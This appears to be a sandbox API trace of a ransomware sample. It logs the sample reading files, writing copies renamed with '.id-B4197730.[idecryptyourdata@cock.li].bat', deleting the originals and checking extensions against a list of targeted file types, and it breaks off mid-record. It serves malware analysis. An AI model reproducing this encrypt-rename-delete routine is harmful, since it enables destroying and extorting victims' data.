[0047.509] lstrlenW (lpString=".jpg") returned 4 [0047.509] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.509] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0047.509] lstrlenW (lpString="LocalizedData.xml") returned 17 [0047.509] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.518] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=80738) returned 1 [0047.518] CloseHandle (hObject=0x2cc) returned 1 [0047.518] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml")) returned 0x80 [0047.518] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.518] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.518] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.518] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.518] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.519] GetLastError () returned 0x0 [0047.519] ReadFile (in: hFile=0x2cc, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x13b62, lpOverlapped=0x0) returned 1 [0047.569] WriteFile (in: hFile=0x2c4, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x13b70, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x13b70, lpOverlapped=0x0) returned 1 [0047.572] ReadFile (in: hFile=0x2cc, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0047.572] WriteFile (in: hFile=0x2c4, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xf6, lpOverlapped=0x0) returned 1 [0047.572] SetEndOfFile (hFile=0x2c4) returned 1 [0047.572] CloseHandle (hObject=0x2c4) returned 1 [0047.574] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.574] SetEndOfFile (hFile=0x2cc) returned 1 [0047.576] CloseHandle (hObject=0x2cc) returned 1 [0047.576] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.576] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1046\\localizeddata.xml")) returned 1 [0047.576] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0047.577] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0047.577] lstrlenW (lpString=".doc") returned 4 [0047.577] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.577] lstrlenW (lpString=".docx") returned 5 [0047.577] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.577] lstrlenW (lpString=".pdf") returned 4 [0047.577] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.577] lstrlenW (lpString=".xls") returned 4 [0047.577] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.577] lstrlenW (lpString=".xlsx") returned 5 [0047.577] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.577] lstrlenW (lpString=".ppt") returned 4 [0047.577] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.577] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0047.577] lstrlenW (lpString=".zip") returned 4 [0047.577] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.577] lstrlenW (lpString=".rar") returned 4 [0047.577] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.577] lstrlenW (lpString=".bz2") returned 4 [0047.577] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.577] lstrlenW (lpString=".7z") returned 3 [0047.577] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.577] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0047.577] lstrlenW (lpString=".dbf") returned 4 [0047.577] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.577] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0047.577] lstrlenW (lpString=".1cd") returned 4 [0047.577] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.577] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0047.577] lstrlenW (lpString=".jpg") returned 4 [0047.578] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.578] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0047.578] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0047.578] lstrlenW (lpString=".doc") returned 4 [0047.578] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.578] lstrlenW (lpString=".docx") returned 5 [0047.578] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.578] lstrlenW (lpString=".pdf") returned 4 [0047.578] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.578] lstrlenW (lpString=".xls") returned 4 [0047.578] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.578] lstrlenW (lpString=".xlsx") returned 5 [0047.578] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.578] lstrlenW (lpString=".ppt") returned 4 [0047.578] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.578] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0047.578] lstrlenW (lpString=".zip") returned 4 [0047.578] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.578] lstrlenW (lpString=".rar") returned 4 [0047.578] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.578] lstrlenW (lpString=".bz2") returned 4 [0047.578] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.578] lstrlenW (lpString=".7z") returned 3 [0047.578] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.578] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0047.578] lstrlenW (lpString=".dbf") returned 4 [0047.578] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.578] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0047.578] lstrlenW (lpString=".1cd") returned 4 [0047.578] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.578] lstrlenW (lpString="C:\\588bce7c90097ed212\\1046\\LocalizedData.xml") returned 44 [0047.578] lstrlenW (lpString=".jpg") returned 4 [0047.579] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.579] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0047.579] lstrlenW (lpString="LocalizedData.xml") returned 17 [0047.579] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.579] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=81482) returned 1 [0047.579] CloseHandle (hObject=0x2cc) returned 1 [0047.579] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml")) returned 0x80 [0047.579] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.579] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0047.579] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.579] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.580] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.580] GetLastError () returned 0x0 [0047.580] ReadFile (in: hFile=0x2cc, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x13e4a, lpOverlapped=0x0) returned 1 [0047.612] WriteFile (in: hFile=0x2c4, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x13e50, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x13e50, lpOverlapped=0x0) returned 1 [0047.614] ReadFile (in: hFile=0x2cc, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0047.614] WriteFile (in: hFile=0x2c4, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xf6, lpOverlapped=0x0) returned 1 [0047.614] SetEndOfFile (hFile=0x2c4) returned 1 [0047.614] CloseHandle (hObject=0x2c4) returned 1 [0047.616] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.616] SetEndOfFile (hFile=0x2cc) returned 1 [0047.617] CloseHandle (hObject=0x2cc) returned 1 [0047.617] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.626] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1049\\localizeddata.xml")) returned 1 [0047.627] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0047.627] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0047.627] lstrlenW (lpString=".doc") returned 4 [0047.627] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.627] lstrlenW (lpString=".docx") returned 5 [0047.627] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.627] lstrlenW (lpString=".pdf") returned 4 [0047.627] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.627] lstrlenW (lpString=".xls") returned 4 [0047.627] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.627] lstrlenW (lpString=".xlsx") returned 5 [0047.627] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.627] lstrlenW (lpString=".ppt") returned 4 [0047.627] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.627] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0047.627] lstrlenW (lpString=".zip") returned 4 [0047.627] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.627] lstrlenW (lpString=".rar") returned 4 [0047.627] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.627] lstrlenW (lpString=".bz2") returned 4 [0047.627] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.627] lstrlenW (lpString=".7z") returned 3 [0047.627] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.627] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0047.627] lstrlenW (lpString=".dbf") returned 4 [0047.627] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.627] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0047.627] lstrlenW (lpString=".1cd") returned 4 [0047.627] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.627] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0047.627] lstrlenW (lpString=".jpg") returned 4 [0047.627] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.628] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0047.628] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0047.628] lstrlenW (lpString=".doc") returned 4 [0047.628] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.628] lstrlenW (lpString=".docx") returned 5 [0047.628] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.628] lstrlenW (lpString=".pdf") returned 4 [0047.628] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.628] lstrlenW (lpString=".xls") returned 4 [0047.628] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.628] lstrlenW (lpString=".xlsx") returned 5 [0047.628] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.628] lstrlenW (lpString=".ppt") returned 4 [0047.628] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.628] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0047.628] lstrlenW (lpString=".zip") returned 4 [0047.628] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.628] lstrlenW (lpString=".rar") returned 4 [0047.628] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.628] lstrlenW (lpString=".bz2") returned 4 [0047.628] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.628] lstrlenW (lpString=".7z") returned 3 [0047.628] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.629] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0047.629] lstrlenW (lpString=".dbf") returned 4 [0047.629] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.629] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0047.629] lstrlenW (lpString=".1cd") returned 4 [0047.629] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.629] lstrlenW (lpString="C:\\588bce7c90097ed212\\1049\\LocalizedData.xml") returned 44 [0047.629] lstrlenW (lpString=".jpg") returned 4 [0047.629] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.629] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0047.629] lstrlenW (lpString="eula.rtf") returned 8 [0047.629] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.629] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=3859) returned 1 [0047.629] CloseHandle (hObject=0x2e0) returned 1 [0047.629] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf")) returned 0x80 [0047.629] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.629] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.630] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.630] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.630] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0047.630] GetLastError () returned 0x0 [0047.630] ReadFile (in: hFile=0x2e0, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xf13, lpOverlapped=0x0) returned 1 [0047.701] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xf20, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xf20, lpOverlapped=0x0) returned 1 [0047.702] ReadFile (in: hFile=0x2e0, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0047.702] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xe4, lpOverlapped=0x0) returned 1 [0047.702] SetEndOfFile (hFile=0x2c0) returned 1 [0047.702] CloseHandle (hObject=0x2c0) returned 1 [0047.703] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.703] SetEndOfFile (hFile=0x2e0) returned 1 [0047.704] CloseHandle (hObject=0x2e0) returned 1 [0047.704] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.704] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf")) returned 1 [0047.704] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0047.704] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0047.704] lstrlenW (lpString=".doc") returned 4 [0047.704] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.704] lstrlenW (lpString=".docx") returned 5 [0047.705] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.705] lstrlenW (lpString=".pdf") returned 4 [0047.705] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.705] lstrlenW (lpString=".xls") returned 4 [0047.705] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.705] lstrlenW (lpString=".xlsx") returned 5 [0047.705] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.705] lstrlenW (lpString=".ppt") returned 4 [0047.705] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.705] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0047.705] lstrlenW (lpString=".zip") returned 4 [0047.705] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.705] lstrlenW (lpString=".rar") returned 4 [0047.705] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.705] lstrlenW (lpString=".bz2") returned 4 [0047.705] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.705] lstrlenW (lpString=".7z") returned 3 [0047.705] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.705] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0047.705] lstrlenW (lpString=".dbf") returned 4 [0047.705] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.705] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0047.705] lstrlenW (lpString=".1cd") returned 4 [0047.705] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.705] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0047.705] lstrlenW (lpString=".jpg") returned 4 [0047.705] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.705] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0047.705] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0047.705] lstrlenW (lpString=".doc") returned 4 [0047.706] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.706] lstrlenW (lpString=".docx") returned 5 [0047.706] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.706] lstrlenW (lpString=".pdf") returned 4 [0047.706] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.706] lstrlenW (lpString=".xls") returned 4 [0047.706] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.706] lstrlenW (lpString=".xlsx") returned 5 [0047.706] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.706] lstrlenW (lpString=".ppt") returned 4 [0047.706] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.706] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0047.706] lstrlenW (lpString=".zip") returned 4 [0047.706] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.706] lstrlenW (lpString=".rar") returned 4 [0047.706] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.706] lstrlenW (lpString=".bz2") returned 4 [0047.706] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.706] lstrlenW (lpString=".7z") returned 3 [0047.706] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.706] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0047.706] lstrlenW (lpString=".dbf") returned 4 [0047.706] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.706] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0047.706] lstrlenW (lpString=".1cd") returned 4 [0047.706] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.706] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\eula.rtf") returned 35 [0047.706] lstrlenW (lpString=".jpg") returned 4 [0047.706] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.707] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0047.707] lstrlenW (lpString="LocalizedData.xml") returned 17 [0047.707] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0047.721] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=80254) returned 1 [0047.721] CloseHandle (hObject=0x2dc) returned 1 [0047.721] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml")) returned 0x80 [0047.721] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.722] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0047.722] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.722] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0047.722] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\2070\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0047.724] GetLastError () returned 0x0 [0047.724] ReadFile (in: hFile=0x2e0, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, 